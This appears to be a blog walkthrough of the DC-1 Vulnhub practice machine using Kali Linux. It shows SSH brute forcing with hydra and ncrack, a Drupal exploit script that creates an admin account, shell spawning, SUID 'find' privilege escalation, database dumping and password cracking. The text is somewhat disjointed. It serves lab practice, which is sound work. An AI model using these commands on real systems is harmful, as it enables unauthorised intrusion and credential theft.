Select Page

DC-1 Vulnhub Kali Linux Walkthrough

by | Apr 14, 2019 | Redteam

Want to practice the skills necessary for developing practical ethical hacking experience? Then read on. That is leveraging Kali Linux against a test virtual machine for one purpose, to go from user to root. Even more so, the goal is to not take the easy way out. Resisting the natural urge to use Metasploit is a habit that is worth starting. That is why I have both options, using Metasploit and not, documented in this walkthrough. This is the DC-1 Vulnhub Kali Linux walkthrough.

Want to setup a home pentesting lab to practice your ethical hacking skills? I spell out how it’s done in the 10 easy steps post.

The DC-1 vulnhub image is a Debian 32 bit operating system with Drupal CMS installed and running. With five flags to capture and read there is plenty to do with this one. I went back afterwards and continued to reason how one could exploit the image in different ways.

There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.

vulnhub.com

Here’s What You Need

The first step is to try to list the running services on the DC-1 vulnerable box. For this I use a variety of tools, nmap, netdiscover, nbtscan.

root@kali:~# nmap -sV 10.0.2.6

Brute-forcing the Running Services

Kali Linux has tools installed already to brute force services on victims. These are hydra, ncrack, and others.

root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.2.6 ssh
root@kali:~# ncrack -p 22 --user root -P /usr/share/wordlists/rockyou.txt 10.0.2.6

One of the best nmap scans to run is to scan for service versions. 

msf > db_nmap -sV -Pn 10.0.2.6

Using Netcat

netcat can act as a TCP server and as a TCP client. 

msf5 > nc -z 10.0.2.6 
[*] exec: nc -z 10.0.2.6 

no port[s] to connect to

msf5 > nc -nv 10.0.2.6

Using Metasploit to Hack DC-1

The right setup can save a lot of time later on. That means I make it a habit to follow these steps every time I launch msfconsole. Performing a db_nmap scan means I can use the hosts and services commands later to list a formatted table of the data gathered so far.

# FOLLOW THESE DIRECTIONS!

# start the database server
root@kali:~ service postgresql start

root@kali:~ msfdb init

root@kali:~ msfconsole

# create workspace. -a for "add"
msf > workspace -a dc01
msf > workspace dc01
The exploit I am using is drupageddon.

100644/rw-r–r– 52 fil 2019-02-19 08:45:11 -0500 flag1.txt

vulnhub kali linux walkthrough
# go to the mysql service location
cd /var/www/includes/database

# open a shell from meterpreter
meterpreter > shell

Looking for files on the server that belong to and are executable by the root user. Python’s pty module to open a local bash shell. Technically the pty module’s spawn method starts a named process and attaches the parent process to the new one’s standard input and output. In this scenario I run Python code using the -c flag. In this syntax multiple statements are separated by a semicolon;.

meterpreter > shell
Process 5291 created.
Channel 11 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www/$

Look for binaries that are owned by root with the hopes of running one of them as root. 

find / -user root -perm -4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find

The find command will look for and execute the /bin/sh binary locally.

www-data@DC-1:/var/www$ find . -exec '/bin/sh' \;
There you have the final flag text file found in the root user’s root directory.

MySQL Database Hacking

Now that we have a bash shell on the local server let’s revisit the database access that we gained earlier.

# mysql -u dbuser -p drupaldb
mysql -u dbuser -p drupaldb
Enter password: R0ck3t


mysql> show databases;


mysql> use drupaldb;


mysql> show tables;


mysql> select * from users;
select * from users;
# Passwords everywhere!

mysql> exit;
DC-1 Vulnhub Walkthrough

Cracked the password found in /etc/shadow for the user, flag4. The password is orange!

SSH Access Using Cracked Password

Using the password I cracked for the flag4 user I make a simple login to the DC-1 server.

Using hydra again only this time cutting the computing time down drastically by supplying the correct username.

root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.2.6 ssh

Or by using ncrack.

root@kali:~# ncrack -p 22 --user root -P /usr/share/wordlists/rockyou.txt 10.0.2.6

Not Using Metasploit

Learn a new command, searchsploit! The exploits are stored in /usr/share/exploitdb and consist of PHP, Ruby, Python, etc scripts.

kali linux walkthrough

Using the exploits in Kali Linux without metasploit is surprisingly extensible to the same vulnerable Drupal server. 

msf5 > python /usr/share/exploitdb/exploits/php/webapps/34992.py -t 10.0.2.6 -u hacker -p pass

[!] VULNERABLE!

[!] Administrator user created!

[*] Login: hacker
[*] Pass: pass
[*] Url: http://10.0.2.6/?q=node&destination=node
error: